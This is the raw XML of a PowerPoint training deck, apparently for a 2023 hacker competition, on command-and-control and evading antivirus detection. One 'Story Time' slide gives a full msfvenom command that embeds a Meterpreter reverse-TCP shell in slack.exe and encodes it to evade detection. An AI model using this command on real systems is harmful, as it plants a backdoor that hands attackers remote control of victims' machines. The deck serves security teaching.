                  <a:pt x="468668" y="315404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528104" y="355384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149644" y="355384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149644" y="383946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528104" y="383946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468668" y="423926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462013" y="428205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460590" y="437248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464870" y="443915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467715" y="448195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471995" y="450100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479602" y="450100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583260" y="381558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589432" y="374421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589432" y="364909"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="739140" h="739140">
                <a:moveTo>
                  <a:pt x="738632" y="369316"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="735469" y="320586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726097" y="273316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716495" y="245008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716495" y="369316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="713511" y="415137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704697" y="459587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690219" y="502234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670293" y="542620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645083" y="580288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614794" y="614794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580288" y="645083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542620" y="670280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502246" y="690219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459600" y="704684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415137" y="713511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369316" y="716495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323494" y="713511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279044" y="704684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236397" y="690219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196011" y="670280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158343" y="645083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123850" y="614794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93560" y="580288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68351" y="542620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48412" y="502234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33947" y="459587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25120" y="415137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22148" y="369316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25120" y="323494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33947" y="279044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48412" y="236397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68351" y="196011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93560" y="158343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123850" y="123837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158343" y="93548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196011" y="68351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236397" y="48412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279044" y="33947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323494" y="25120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369316" y="22136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415137" y="25120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459600" y="33947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502246" y="48412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542620" y="68351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580288" y="93548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614794" y="123837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645083" y="158343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="670293" y="196011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690219" y="236397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704697" y="279044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="713511" y="323494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716495" y="369316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716495" y="245008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689521" y="185013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662698" y="144932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630440" y="108191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="593750" y="75933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553681" y="49110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510730" y="27914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465353" y="12534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418058" y="3162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320573" y="3162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273278" y="12534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227914" y="27914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184950" y="49110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144881" y="75933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108204" y="108191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75946" y="144881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49110" y="184950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27914" y="227901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12534" y="273278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3162" y="320573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3162" y="418058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12534" y="465353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27914" y="510730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49110" y="553681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75946" y="593750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108204" y="630440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144881" y="662698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184950" y="689521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227914" y="710717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273278" y="726097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="320573" y="735469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369316" y="738632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418058" y="735469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465353" y="726097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510730" y="710717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553681" y="689521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="593750" y="662698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630440" y="630440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662698" y="593750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689521" y="553681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710717" y="510730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726097" y="465353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735469" y="418058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738632" y="369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E16A984-4B49-3DBA-08C4-D15C1D421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323" y="49984"/>
            <a:ext cx="9095595" cy="863057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/>
          <a:p>
            <a:pPr marL="8255" marR="3175" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Story Time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800">
              <a:latin typeface="Tenorite"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Script Kiddie | Know Your Meme">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E7382EC-E2CB-8C66-10FB-FFF4EC61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773" y="1042971"/>
            <a:ext cx="2594213" cy="255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A8C54136-26E2-769A-409A-463A3D045A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227357" y="1042971"/>
            <a:ext cx="6890154" cy="4464043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1155" marR="3175" indent="-3429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/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Meet Jim “the skid” Johnson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tenorite"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="351155" marR="3175" indent="-3429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</a:rPr>
              <a:t>Social Engineering Game Developer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808355" marR="3175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Works at Rockstar Games</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808355" marR="3175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Uses Slack as internal communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808355" marR="3175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2400" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Profit $$$ with pre-alpha footage of GTA 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="465455" marR="3175" indent="-4572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3200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Backdoor EXE File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="808355" marR="3175" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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msfvenom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 -a x86 --platform windows -x slack.exe -k -p windows/</a:t>
            </a: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meterpreter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/</a:t>
            </a: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reverse_tcp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 </a:t>
            </a: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lhost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=192.168.1.101 </a:t>
            </a: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lport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=4444 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" spc="10" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sitka Text Semibold" panose="020B0604020202020204" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sitka Text Semibold" panose="020B0604020202020204" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> -b "\x00" -f exe -o slack.exe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8D553C8-D59E-2F1A-3FC0-B40EE4864F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227357" y="5777381"/>
            <a:ext cx="6890154" cy="493725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12319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marR="3387">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" spc="10">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>How to blend into network traffic??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415461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A5EA13B81144A8FF6909EEA51D59F" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="e30918f834ff2dda5b287fe91352f813">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="62df5ae3-8b67-46c1-8b60-e35463107508" xmlns:ns4="658a8f0c-b4e9-4dd2-bce2-130db7a21acf" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e59420609cd0db0f54b48685afcc4981" ns3:_="" ns4:_="">
    <xsd:import namespace="62df5ae3-8b67-46c1-8b60-e35463107508"/>
    <xsd:import namespace="658a8f0c-b4e9-4dd2-bce2-130db7a21a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df5ae3-8b67-46c1-8b60-e354631075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8a8f0c-b4e9-4dd2-bce2-130db7a21a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2df5ae3-8b67-46c1-8b60-e3546310750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316798-0D98-4BCE-8E7A-547219CA3900}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="62df5ae3-8b67-46c1-8b60-e35463107508"/>
    <ds:schemaRef ds:uri="658a8f0c-b4e9-4dd2-bce2-130db7a21a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23C2E22-8F7A-40E9-8167-015CA1957E3C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="62df5ae3-8b67-46c1-8b60-e35463107508"/>
    <ds:schemaRef ds:uri="658a8f0c-b4e9-4dd2-bce2-130db7a21ac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54817BE-0034-4765-BB75-3EB1978B9A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Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>202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Fira Sans Extra Condensed Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Cascadia Code</vt:lpstr>
      <vt:lpstr>Montserrat ExtraBold</vt:lpstr>
      <vt:lpstr>Montserrat ExtraLight</vt:lpstr>
      <vt:lpstr>Sitka Text Semibold</vt:lpstr>
      <vt:lpstr>Tenorite</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Command &amp; Control</vt:lpstr>
      <vt:lpstr>Cyber Kill Chain</vt:lpstr>
      <vt:lpstr>Payload Out-of-the-Box</vt:lpstr>
      <vt:lpstr>Important Components</vt:lpstr>
      <vt:lpstr>HTTP vs SMB</vt:lpstr>
      <vt:lpstr>Story Time</vt:lpstr>
      <vt:lpstr>C2 Malleable Profile</vt:lpstr>
      <vt:lpstr>Other Named Pipes</vt:lpstr>
      <vt:lpstr>Web Hook</vt:lpstr>
      <vt:lpstr>C2 Infrastructure Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Anti Malware Scanning Interface</vt:lpstr>
      <vt:lpstr>Memory Scanner</vt:lpstr>
      <vt:lpstr>Sleep Obfuscation</vt:lpstr>
      <vt:lpstr>Thread Stack Spoofing</vt:lpstr>
      <vt:lpstr>Static Detection</vt:lpstr>
      <vt:lpstr>Win32 API</vt:lpstr>
      <vt:lpstr>Injector 1: Runner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Post-Exploitation Defense Evasion</vt:lpstr>
      <vt:lpstr>IoC – Sacrificial Process</vt:lpstr>
      <vt:lpstr>IoC - CLR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❕ ASEAN Battle of Hackers 2023 ❕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 Ops: HAVOC 101</dc:title>
  <dc:creator>LIM WEI XUN</dc:creator>
  <cp:lastModifiedBy>WESLEY WONG KEE HAN</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-12T14:59:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-25T00:27:25Z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0x0101007B3A5EA13B81144A8FF6909EEA51D59F</vt:lpwstr>
  </property>
</Properties>
</file>